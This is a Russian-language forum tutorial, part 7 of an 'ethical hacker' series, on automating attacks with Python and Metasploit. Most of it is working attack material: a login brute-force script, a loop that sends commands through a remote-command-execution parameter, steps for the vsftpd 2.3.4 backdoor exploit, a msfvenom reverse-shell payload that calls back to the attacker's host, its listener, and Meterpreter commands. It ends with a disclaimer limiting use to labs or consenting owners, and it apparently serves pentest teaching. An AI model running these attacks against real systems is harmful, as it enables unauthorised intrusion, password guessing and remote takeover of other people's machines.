Путь этичного хакера – Часть [7] – Автоматизация атак с помощью Python и работа с Metasploit

HMCoba

Форумчанин
Регистрация
14.06.2025
Сообщения
20
Реакции
26
2ntes1t.png


🧠 Путь этичного хакера часть - 7

Автоматизация атак с помощью Python и работа с Metasploit



📌 Оглавление серии:



📌 Зачем автоматизировать атаки?
Ручное выполнение одних и тех же действий — медленно и неэффективно.

Скрипты на Python позволяют:
  • Перебрать логины/пароли
  • Автоматизировать поиск уязвимостей
  • Подключаться к целям и загружать полезную нагрузку



📍 Пример 1: Брутфорс логина через форму входа (POST-запрос)

Цель — отправить десятки логинов и паролей на сайт и посмотреть, сработает ли что-то.

Python:
import requests

url = "http://target.site/login"
user = "admin"
passwords = ["123456", "password", "admin123", "toor"]

for pwd in passwords:
    data = {"username": user, "password": pwd}
    r = requests.post(url, data=data)
 
    if "Добро пожаловать" in r.text:
        print(f"[+] Успешно: {user}:{pwd}")
        break
    else:
        print(f"[-] Ошибка: {pwd}")

🔍 Подставьте адрес формы, поля и текст ответа, по которому можно понять — вход выполнен.



📍 Пример 2: Автоматическое выполнение команд через RCE

Если у вас есть уязвимость Remote Command Execution (например, через GET-параметр):

Python:
import requests

url = "http://target.site/vuln.php"
payloads = ["id", "whoami", "uname -a"]

for cmd in payloads:
    r = requests.get(url, params={"cmd": cmd})
    print(f"$ {cmd}\n{r.text.strip()}\n")

Это полезно для быстрого сбора системной информации.




📦 Metasploit Framework — краткое введение
Metasploit — один из главных инструментов пентестера. Он содержит сотни эксплойтов, сканеров и полезных загрузчиков.

Запуск Metasploit:
Код:
msfconsole

Откроется интерактивная консоль. Ниже — минимальный сценарий атаки.



📍 Пример: использование эксплойта против уязвимого сервиса

1. Запустить консоль:
Код:
msfconsole

2. Найти эксплойт:
Код:
search vsftpd

3. Выбрать эксплойт:
Код:
use exploit/unix/ftp/vsftpd_234_backdoor

4. Указать цель:
Код:
set RHOSTS 192.168.1.10

5. Запустить:
Код:
run

Если успешно — будет открыт shell.



📍 Пример: генерация reverse shell payload’а

Код:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf > shell.elf

📎 Объяснение:
-p — используемый payload
LHOST/LPORT — IP и порт атакующего
-f elf — формат для Linux
> shell.elf — сохранить в файл

Загрузите shell.elf на сервер и сделайте исполняемым:
Код:
chmod +x shell.elf
./shell.elf

На атакующей стороне запустите обработчик:
Код:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
run

🔌 При соединении откроется интерактивный Meterpreter-сессия.



💡 Дополнительно: команды в Meterpreter

Код:
sysinfo       — информация о системе
getuid        — под кем мы сейчас
shell         — перейти в обычный bash
upload file   — загрузить файл
download file — скачать файл



✅ В этом выпуске вы узнали:
  • Как с помощью Python автоматизировать атаки на форму входа
  • Как выполнять команды на удалённой машине через RCE
  • Как использовать Metasploit и msfvenom
  • Как сгенерировать шелл и подключиться через Meterpreter

⚠️ ВАЖНО:
Все действия допустимы только в рамках учебной среды или с прямого согласия владельца системы.
Несанкционированный доступ квалифицируется как преступление и может повлечь за собой уголовную ответственность.
 
Последнее редактирование:

Похожие темы

Назад
Верх Низ